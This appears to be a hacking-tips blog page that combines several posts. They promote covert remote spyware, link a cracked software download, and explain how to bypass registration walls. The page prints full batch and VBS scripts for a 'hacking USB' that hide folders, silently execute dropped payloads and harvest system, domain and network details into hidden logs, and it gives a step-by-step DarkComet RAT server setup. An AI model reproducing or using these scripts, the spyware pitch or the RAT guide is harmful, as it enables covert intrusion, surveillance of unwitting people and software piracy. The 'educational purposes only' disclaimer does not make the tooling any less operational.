Hack by SniperSpy

SniperSpy remote spyware silently logs all web sites, chat conversations, instant messages, keystrokes, applications and more in real time. See everything your child, employee or anyone does while they use your distant computer - remotely.
Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. No physical access to the remote PC is needed to install the spy software. Once installed it records chat conversations, web sites and more.

This software remotely installs to your computer through email. Unlike the other remote spyware titles on the market, Sniper Spy fully and completely bypasses the Windows XP Firewall.

The program then records user activities and sends the data to your online control panel. You login to your control panel to view spy results using your own password-protected account.


Browser Based Hacking Framework - Mantra Security Toolkit 0.6.1 Released

Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

The software is intended to be lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.
Project Goals

  • Create an ecosystem for hackers based on browser
  • To bring the attention of security people to the potential of a browser based security platform
  • Provide easy to use and portable platform for demonstrating common web based attacks( read training )
  • To associate with other security tools/products to make a better environment.
You can download Mantra 0.6.1 here:
Linux 32-bit – Mantra Security Toolkit – Gandiva.tar.bz2
Windows – OWASP Mantra Security Toolkit – Gandiva.exe
Or read more here

Making a Ultimate Hacking USB with Only .BAT files.

I have seen many different attempts at creating a USB hacking tool. The switchblade and hacksaw were okay, but they would set off many alarms deeming it useless,
@(echo off & break off & Title _) >nul
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
attrib +s +h %0

@(echo off & break off & Title _) >nul
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system

if exist inject.vbs start "" "inject.vbs"
    echo set o = createobject("wscript.shell") > inject.vbs
    echo o.run "%~0 script", vbhide, true >> inject.vbs
    start "" "inject.vbs"

If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start ""  %%j
Goto BatCheck
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start ""  %%h
Goto VbsCheck
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start ""  %%i
Del /F /Q inject.vbs >nul
@cls & @Exit

@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system

if exist sysinfo.vbs start "" "sysinfo.vbs"
    echo set o = createobject("wscript.shell") > sysinfo.vbs
    echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
    start "" "sysinfo.vbs"

Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************  >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo ***********************************************  >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo     Dim objRequest, strURL >>wan.vbs
echo     MyIP_XMLHTTP = "" >>wan.vbs
echo     strURL = "http://www.whatismyip.com/automation/n09230945.asp"  >>wan.vbs
echo     Set objRequest = CreateObject( "Microsoft.XMLHTTP" )  >>wan.vbs
echo     objRequest.open "GET", strURL, False >>wan.vbs
echo     objRequest.send vbNull >>wan.vbs
echo     If objRequest.status = 200 Then MyIP_XMLHTTP =  objRequest.responseText >>wan.vbs
echo     Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject")  >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
for /F "tokens=* delims=" %%i in ('reg query  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"')  do set lang=%%i
set lang=%lang:~68,5%
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo.  >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul

Folder Guard Professional 8.3.2 Full Version

Folder Guard Professional is a powerful computer security software that you can use to control access to files, folders, and other Windows resources, such as Control Panel, Start Menu, and so on. You can use Folder Guard to lock your personal files and folders with passwords, to stop other users from peeking into your records. You can even completely hide your private folders from virtually all applications, and such folders would remain invisible until you enter a valid password. You can also protect sensitive system files from modification or destruction, disable access to the removable drives, restrict access to Control Panel, and more.

Folder Guard Professional Edition for Windows Vista, XP, 2000, Server (both 32-bit and 64-bit)
This edition combines the 32-bit and x64 editions of Folder Guard in one convenient package. When installed on the 32-bit versions of Windows it offers the same functionality as Folder Guard 32-bit Edition. When installed on the x64 versions of Windows, it works in the same way as Folder Guard x64 Edition. The older MS-DOS-based releases of Windows (such as Windows, 95, 98, Me) are NOT supported by this edition.

Why should you choose Folder Guard:

>> Folder Guard lets you password protect your files and folders.
You can protect with password virtually any folder or file, allowing only the authorized users to open the protected files or folders. You can protect an unlimited number of files and folders, each with its own password, or you can use the Master Password of Folder Guard to unprotect them all at once.

>> Folder Guard can hide your personal folders from other users.
You can set up Folder Guard to hide your private folders (or make them appear empty). The folder would be hidden from virtually any program, including Windows Explorer, Office, MS-DOS programs, etc.

>> Folder Guard can restrict access to Control Panel, Start Menu, Desktop, etc.
You can set up Folder Guard to allow only certain users to change the computer settings with Control Panel, while denying that to other users. You can control access to various settings of Start Menu, Desktop, Taskbar, and other Windows resources. You can remove the Run and Search commands on the Start menu, hide specific drives, lock the Internet settings, and more.

>> Folder Guard can protect access to the floppy, CD-ROM and other removable drives
You can configure Folder Guard to allow or deny access to the removable drives, restricting the user's ability to run or install unauthorized programs on your computer.

>> Folder Guard is suitable for a wide range of the computer security tasks.
You can stop other users of your computer from peeking into your personal files. You can protect the system files and folders from destruction by cyber-vandals. You can allow specific users to run a program while deny it to others. You can allow users to use the removable drives to store their documents while prevent them from running unauthorized programs from the removable disks.

>> Folder Guard protects your files without encrypting them.
There is no risk of losing your documents if you lose your encryption key: with Folder Guard all your files remain intact, without modification of any kind.

>> Folder Guard lets you quickly enable or disable the protection via a "hot key".
You can choose a specific keyboard combination as the hot key of Folder Guard, to be able to quickly enable or disable the protection of your computer. Of course, the "hot key" is protected with your password, too, only you can use it!

>> Folder Guard can operate in the "stealth mode".
You can set up Folder Guard to operate in the stealth mode, to hide its own files and shortcuts from being seen by other users. You would still be able to control Folder Guard via the "hot key".

>> Folder Guard supports easy recovery in case of emergency.
If you forget your password, or experience other problems, simply use the Emergency Recovery Utility (free download) to quickly restore access to your protected folder.

>> Folder Guard works with drives of any format.
If your computer can handle it, Folder Guard can protect it. You don't have to format your hard drive with the NTFS file system: Folder Guard can protect files and folders on both NTFS and FAT/FAT32 disks.

>> Folder Guard runs on a wide range of Windows platforms.
From Windows 2000 to Windows XP to Windows Vista and later, with all service packs and hotfixes, all are supported by at least one of the available editions of Folder Guard.

>> Folder Guard is easy to use.
Folder Guard sports one of the most intuitive user interfaces, that makes it easy to use for both novice users and computer professionals.

>> Folder Guard "speaks" plain English.
You don't have to be a computer professional to understand how to use Folder Guard. The Quick Start Wizard can guide you through the steps necessary to set up the password protection of your personal folders. Folder Guard Advisor warns you about situations that may require your attention and offers possible workarounds. Folder Guard User's Guide describes its commands and operation in plain English, without "pseudo-techno" or "geeky" talk. (And it does not baby-sit you either).

>> Folder Guard is not a toy.
Folder Guard is used by large corporations and small businesses, schools and police departments, universities and correctional facilities, libraries and hospitals (to name a few).

>> Folder Guard is widely used.
Hundreds of thousands of copies of Folder Guard have been downloaded by computer users from virtually all countries of the world.

>> Folder Guard offers the best value for the money.
None of our competitors offers a product that would come close to Folder Guard.

>> Folder Guard is flexible.
Although Windows lets you restrict access to folders located on a NTFS drives, it cannot hide them. With Folder Guard, you can not only restrict access to, but also hide folders, or make them look empty. Unlike Windows, Folder Guard lets you protect only some files within a folder, and keep the rest of the files visible and accessible, if you wish. Or, you can protect files and folders each with its own individual password, and then unlock them separately from each other (Windows cannot do that).

>> Folder Guard can be used with other disk tools.
You can designate your anti-virus and other disk maintenance tools to be the "trusted" programs, to make them able to work with your protected disks without restrictions.

>> Folder Guard is extensible.
You can fine-tune the access rules to the files and folders of your computer by creating appropriate filters.

>> Folder Guard will save you hours of learning time.
You don't have to learn how to use the Group Policies, user groups, Access Control Lists, privileges, and other built-in security features of Windows, because Folder Guard does the hard work for you: its visual and intuitive user interface lets you manage the restrictions with ease.

>> Folder Guard is actively maintained.
Since its first release back in 1997, we've been continuously extending, enhancing, and improving Folder Guard. Now in version 7.92, Folder Guard gives you more power than ever.

Folder Guard 8.3.2 Incl. Patch zoo
Download : | FileSonic | DepositFiles | Turbobit |

How to: View Hidden Forums and Websites that ask for registration < Firefox version.

Today I will tell you how to do it on Firefox with an Add-on.

What you need is
An Add on called User Agent Switcher  ( Download > https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/)

All you have to do is to open drop down menu for User Agent Switcher and change your agent to search engine. and then you will views websites like that User Agent (Search engine) that you chooses. Simply after your work is done change the agent back to you own.

What is Sandbox? < Must read!

Sandbox: is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers and untrusted users. (Wikipedia)

Ok, lets cut it simple. Sandbox is a software which you use to open other programs, These programs which we open are suspicious(untrusted) programs so that even if they are any Virus, Keylogger or R.A.T they would not be installed on your computer and your computer will not be effected by it. So if you are encountered by any software about which you are not sure that it is clean you should be open it with Sandbox.

One example of Sandbox is Sandboxie which you can download from here : http://www.sandboxie.com/index.php?DownloadSandboxie

[Tutorial] How to set up DarkComet 3[Detail Pics]

First, go to the official website of Darkcomet, here. And click on "Download", like on this picture. 
[Image: darkcomet1.png]

After clicking "Download", choose the version of DarkComet that you want on the following image, I choose DarkComet FWB 3.2. class="Apple-style-span" style="color: #cccccc; font-family: Verdana,Arial,sans-serif; font-size: 13px; line-height: 18px;">
[Image: darkcomet2.png]

Check all before downloading.
[Image: darkcomet3.png]

After starting DarkComet you must accept the "Terms and condition".
[Image: darkcomet4.png]

Now, let Darkcomet aside for a moment, You need to register No-IP, by clicking here.
After completing your registration form, you must go on "Manage Hosts".
[Image: darkcomet5.png]

Now click on "Add a Host".
[Image: darkcomet6.png]

After clicking "Add a Host" you must choose a "Hostname".
[Image: darkcomet7.png]

Now you'll need to download "No-IP Dynamic Update Client v3.0.4" but in first, choose your "Operating System".
[Image: darkcomet8.png]

Now that you've chosen your "Operating System"you can download.
[Image: darkcomet9.png]

STEP 10:
Now, you'll need to install No-IP.
[Image: darkcomet10.png]

STEP 11:Now, choose the install location and click on "Next >".
[Image: darkcomet11.png]

STEP 12:
Now, choose start menu folder, and click on Install.
[Image: darkcomet12.png]

STEP 13:
Now you will configure No-Ip, start it and enter your E-mail address & password entered on No-IP.org.
[Image: darkcomet13.png]

STEP 14:
Now you must select you Host, check you Host and click on Save.
[Image: darkcomet14.png]

STEP 15:
It's OK, you can start up DarkComet 3.2 FWB. Now you must add server socket.
[Image: darkcomet15.png]

STEP 16:
Now you edit your server, you will choose the "Server module (634,50 KB)".
After clicking on "Server module (634,50 KB) a window called "Server Editor - Installer version <3.0.2>" will appear.

[Image: darkcomet16.png]

STEP 17:
Now you start to edit the server.
[Image: darkcomet15.png]

STEP 18:
Now, must enter your No-IP and test it, if the message is green, it's OK.
After, you can click on "Build module".

[Image: darkcomet18.png]

STEP 19:
Now, you can create the server, save it, and open it.
[Image: darkcomet19.png]

STEP 20:
By opening your server, if it worked,a message at the bottom right of your screen will appear.
[Image: darkcomet20.png]

Here is the final result.
[Image: darkcomet21.png]

Now the server is set up and totally ready.
This article was originally published on :: http://www.hackforums.net/showthread.php?tid=1218482 and written by :: XxHaTeD-RaTeDXx


The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.